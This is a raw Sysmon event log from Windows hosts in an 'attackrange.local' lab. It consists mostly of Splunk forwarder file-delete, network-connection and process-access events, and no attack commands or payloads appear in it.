23542300x80000000000000001060557Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:26.834{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6E1BFD0F223A6318B58E64D20C5B8CD,SHA256=64FEEC53740D693D1B8316EE544097036B922EC41D65F04AD233528BD93BE333,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060558Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:24.973{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54740-false10.0.1.12-8000- 23542300x80000000000000001060559Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:28.193{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=029E5996CBF786CF6F00200AC23F0317,SHA256=094555C06286A473F59D15316FBA1C497D19D2788C3964AFA60110730EEAFC2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060560Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:29.600{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81FF49519423F5A603E6841A08331D00,SHA256=581FF8040857E5CE0FDBC4C35D207BC21BA21EB3D24DBA3FDE29717432B02B1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245122Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:29.605{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC3BD2809FAF5003D27E69DCC7B2F102,SHA256=879924626B6888386AF1C2B1FB7A33599FF1C494D14211F5B1EECA05BDEAA036,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060561Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:30.959{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7FD4D8BC3710E0B7B378985E767888C,SHA256=9B9B95867DE170512251AEBB97139042657C980228FF2A1936D227AA29F2FB92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245124Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:30.605{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5257D1B08B2638CAF08B5342D887B51B,SHA256=31E2C0A174FE826B0CE747E7B2B6BE23529FFF6972F9EBD528FD35A57CADE0BD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245123Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:28.675{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64729-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x80000000000000001060563Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:31.819{7F8C56E7-4E3C-6063-0D00-00000000AF01}8924808C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2E00-00000000AF01}2196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001060562Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:31.647{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6CC2DBFF21E90B7DEB489FDBC9F69705,SHA256=2AFF5ED882E34ED7C4A00809B37DBD124E89C5F3E02E64A0D32E55A7A695A9BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245125Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:31.605{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4F2B8CED26E423699D569C68EDEBACA,SHA256=B9A48C21686DE5056602048EC3E39818A9A0724A8E7FE86BD5D4EBAD2BE26377,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060565Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:30.098{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54741-false10.0.1.12-8000- 23542300x80000000000000001060564Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:32.319{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B404DD416B0D74ED1673EE19F0CA1704,SHA256=91D729116590FE8F5C68A525373BB160724D71060DD20CA60D78E6DC40560641,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245126Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:32.605{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA54E38082CB976145094A551CAC2018,SHA256=777D8A025148AB811C6C9B8CF9AA6D72E5FE724EFCD0C25122186A2AC70C0253,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060566Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:33.679{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1760539990364E28480AF406332644EC,SHA256=6DA7AEC40BC965096BE4F92DF62AB6687499669A18E468198023718EE2E5DD4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245127Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:33.605{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C607C177ACB71375C67CFD0ABA2078AF,SHA256=15D949C10D88335236F772BD0D256F0C1C60EF1C9AA3732E746018613D0F15C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245130Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:34.605{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D68304466C49971170F7C047CE047CD6,SHA256=DF9DA474D9A9D383A7439FEF3F51DB8B5E978DF781B57CB90B1C2DAA5167839C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245129Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:34.293{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6B2379F8C926FBF92057B1FB817A5168,SHA256=6C7CE1D04B0D5C133F4708A6B8960C52BCE5353D43465DD4F0242DF7C27F584F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245128Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:34.293{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=65725C77294AD3F175264EB9ABE1C23B,SHA256=C89BE16345172801227AA6620D7C1900E14C30268622DB143E716FC903ADCAA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060567Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:35.038{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=236EEA8635578743D6CBDA5A81CD0226,SHA256=20A14E2A86F3DD672C81E777332415A2FEA95F0D0B6C0FEED357E9DA14B19976,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245132Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:35.621{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76ACFFD846F621075D562B1D3A7D44C1,SHA256=99B9858C60D112F83169721B9FD6D2DD49766EDE887E511D9DEC077E7DBAEF04,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245131Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:33.690{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64730-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001060568Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:36.398{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=076AC866CB36FA6E766FEA3212EF0D4E,SHA256=6479765B64A5C0F5D9DCEC3B170657EE4CB8C3A68B28CC81E35D2761948C1668,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245133Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:36.621{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47CE90A4E3E0120816639193E38B5CDF,SHA256=C46C5A0ADF7E5179F0251B9BBD6B12537B510238B8007A22158DED9782736029,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060572Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:37.320{7F8C56E7-4E3C-6063-0D00-00000000AF01}8924808C:\Windows\system32\svchost.exe{7F8C56E7-4F98-6063-D400-00000000AF01}3720C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060571Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:37.320{7F8C56E7-4E3C-6063-0D00-00000000AF01}8924808C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2E00-00000000AF01}2196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060570Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:37.320{7F8C56E7-4E3C-6063-0D00-00000000AF01}8924808C:\Windows\system32\svchost.exe{7F8C56E7-4F98-6063-D300-00000000AF01}6052C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060569Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:37.320{7F8C56E7-4E3C-6063-0D00-00000000AF01}8924808C:\Windows\system32\svchost.exe{7F8C56E7-4F98-6063-D300-00000000AF01}6052C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000245134Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:37.621{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AF260FBF10262A879E8175C1FCF0FC8,SHA256=A8AF649713C1376EEB2381BF0B90F3E91F352E033CFC0A468214EF8C735ABD59,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060575Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:35.973{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54742-false10.0.1.12-8000- 23542300x80000000000000001060574Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:38.476{7F8C56E7-4F98-6063-D400-00000000AF01}3720ATTACKRANGE\AdministratorC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\3720.xml~RFae53e.TMPMD5=E210DA0F304440F4891BF54909C19C98,SHA256=B43FE905936B0150E6255A077026B1F44D6EB79DFEDD0662E47A023D849120A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060573Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:38.398{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F04CD29DCEC22A6B742465AFFD0E43ED,SHA256=A8302DEE7202ACB42B4EE1DE3EFFD4D40B85425B15EA3327CF10B3682E184758,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245135Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:38.652{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CCC7FB3062DF5C9B21AA3B4A7E7567C,SHA256=2F6C4E90FB840A73A5FEB90AA30509A4D91B2AF86A61D9AC0683C87EBC9C343B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060576Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:39.227{7F8C56E7-4E3C-6063-0D00-00000000AF01}8924808C:\Windows\system32\svchost.exe{7F8C56E7-4F98-6063-D400-00000000AF01}3720C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000245138Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:39.668{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BC92DF06CF295197F5E9F1BC90DAADC,SHA256=7C39D3DA2C9532913484E746C9A98750989130D55BA7B38ABBB57C5727D5FE98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245137Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:39.293{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1BFEE85AA0676BFDD56AEADAA098D1A8,SHA256=70764C4462C91E222F15110E5DF1121603AD57162C0B0D322451602A43C0181C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245136Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:39.293{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6B2379F8C926FBF92057B1FB817A5168,SHA256=6C7CE1D04B0D5C133F4708A6B8960C52BCE5353D43465DD4F0242DF7C27F584F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060578Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:40.977{7F8C56E7-4E3C-6063-0D00-00000000AF01}8924808C:\Windows\system32\svchost.exe{7F8C56E7-4F98-6063-D400-00000000AF01}3720C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001060577Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:40.024{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB30FD04BE11995F6CB4E4CB0AC14A95,SHA256=1F9269C518CAA236B9E93985EBC739DA07FE76A558C810EB0F1ED9E945287E52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245140Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:40.684{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56A0043238FC0C9D7D99A731358E4494,SHA256=9A03A24C3E76672C97636CDBEBA8DE1AADEFA743F53EE0C6FDA685E5C9583BFA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245139Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:38.690{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64731-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001060579Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:41.399{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF7CFA11B2A170C1D7AD87D1DECB30AE,SHA256=49D7A7FD7C9D40BF77BD08BC7B7D1037FDD92E7FDCFD46DA776E19B86DCEDBC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245141Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:41.684{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=629B688E3C512A27D8594922E8F70B60,SHA256=BC87421B4E1B92B91C51C845FFF9072674B03916F8008FEDB8E07E387CAAC72F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060581Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:42.805{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8DFB8AE36571DD6235BF01693EB34B0F,SHA256=646368DFF8D8C698FF76120922C906F22A56CC4B162629A854F425773C648225,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060580Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:42.805{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABA4FCEDCB8D27C85979BCBC2D848552,SHA256=C658A14471A1CB560D2631BBB5633110AD47D46644A02982AEBED64B49302607,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245142Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:42.684{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DD9F9CCED2FEDFAE8CFDB725D1A3095,SHA256=50F47DCBF2BAFB589ACE71E4256DC65876AF2F53AC5923F45CBF0F0777EED75D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245143Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:43.746{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E9D01ADE757975BB68EEBA10F75C22D,SHA256=688D6777D93E78B59E1B5B7FC9FFE80F8A8F95A3F1EE98981266D9D6717B6C65,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060583Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:41.957{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54743-false10.0.1.12-8000- 23542300x80000000000000001060582Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:44.165{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA5AA7054546E61C50C44F1E009966FA,SHA256=7A555020441E0514761F8A215B1740D69281915A5D0F267C2EC6C3FB3CD1A34C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245144Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:44.746{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B05C8BB7CCB51D2EA7DF843B6BC9203F,SHA256=284FE2A251EBFEDA05BC077A6D6A1D048EBDBD99E5DD7512131B1198C235377E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060584Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:45.525{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 